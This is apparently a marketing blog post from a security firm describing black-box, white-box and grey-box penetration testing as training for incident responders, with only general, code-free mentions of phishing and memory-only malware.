Taking the time to understand adversary tools, techniques, and methodologies will help you gain confidence in your defense and know what to do in each situation. One way to do this is through penetration testing, as it gives incident responders a path to build knowledge into skills using practical application. Then, you constantly refine those skills through practice and more testing. This will help you improve each skill as well as help you integrate and interface different skill sets with more speed and accuracy.

Penetration testing involves emulating adversary tradecraft to help responders understand their methodologies and why they choose to combine individual techniques for specific scenarios and objectives. Doing this work helps you to better anticipate and counter these tactics and techniques. We can use different types of penetration testing to build on our understanding of attacks and improve our confidence in defense. Here is a look into how black-box, white-box, and grey-box testing works.

Black-Box Testing

Penetration tests simulate attacks on networks and systems to uncover vulnerabilities and weaknesses. When responders are dealing with a cyber attack, they must contend with the “known” information about the attack, but also the “unknown.” This includes things like:

• What was the actor able to accomplish?
• What new problems result from workarounds?
• How many systems have similar vulnerabilities?

The best way to answer these questions is by hunting and detecting post-exploitation with behavior mapped to MITRE ATT&CK techniques, which is a framework for understanding attacker tactics and techniques.

How it works

Black-box testing simulates an attack where little to no information about the system is available to the tester. The point is that what’s considered “known” during an incident is often a surface problem and can change depending on what has been shared or discovered. Much of the threat landscape remains hidden until further investigation occurs. Therefore, responders must work in environments with minimal information—sometimes with little help from open-source tools—requiring deeper analysis.

This type of testing promotes the use of observed patterns and behaviors using behavioral analytics, frequency analysis, time-series analysis, and link analysis which can be quickly used to identify users and systems that are involved in or have been impacted by the compromise. Models like the Diamond Model and the Cyber Kill Chain help responders discover artifacts related to the compromise (like malware) and provide context as they work to build a complete picture of the incident, the extent of damage, and plans for mitigation and eradication.

Black-box testing pushes responders to think beyond what they know, using deeper analytical methods to uncover the full nature of an attack, including unexpected threats or behaviors that may not be immediately visible.

White-Box Testing

An analyst’s job is to defend the network, but to do that, they must actively interpret attacks to solve problems in stressful situations and often under time-constraints. They have to think quickly to deny opportunities to exploit vulnerabilities, identify and counter the use of offensive techniques being used by the attacker, evaluate the success of the adversary actions, and explain the logic and intent of the adversary actions and decisions.

How it works

This requires practicing the act of gathering different pieces of information and attempting to identify relationships and correlations to build a complete picture of adversary operations. Training labs are effective learning tools because they offer analysts different levels of available information and different scenarios depending on levels of skill and experience. White-box testing aims to increase a responder’s understanding of adversary approaches and attacks.

Testing must present realistic scenarios with different levels of visibility for logging, users, systems, analysis tools, and management tasks. These scenarios require different combinations of commercial and open-source data, artifacts obtained from incident response and triage, and digital forensics and incident response (DFIR) skill sets to successfully complete. By doing these exercises, responders gain experience integrating a variety of tools and information to predict and anticipate adversary actions and determine how, why, and when they are most likely to occur.

Grey-Box Testing

Grey-box testing aims to improve a responder’s ability to prioritize and address key issues during an incident. To do this, we need a clear understanding of what offensive actions are being performed, why they are being used, and what an adversary can obtain or accomplish on a system at any given time. Adjusting the amount of information visible and presenting multiple test cases for specific high-percentage techniques is the primary focus of grey-box testing.

How it works

For example, many consider phishing to be the most effective technique for gaining a foothold on a network, while memory injection is one of the best ways to remain on a compromised machine undetected, because the actor isn’t writing malicious code to the disk. Several methods of payload delivery (inserting malicious code) combine both of these techniques in order to compromise a system without writing to disk. Because these attacks don’t leave traces on the disk, analysts need to focus on discovering memory-only artifacts, or remnants of malicious activity that are stored in the system’s memory. Identifying these artifacts is crucial for fully understanding the scope of an attack and successfully completing the phases of incident response, such as scoping, containment, and eradication phases.

Grey-box testing scenarios present analysts with various implementations of these high-percentage techniques. During testing, the visibility of certain aspects of the attack is also adjusted to expose analysts to different perspectives on the same techniques. For example, they might be shown different ways malware interacts with the Windows API or how memory-only malware is deployed through phishing. This helps to become more versatile in detecting and responding to these types of attacks.

Contact Phoenix Cyber now to learn more about how to implement these different types of testing into your processes.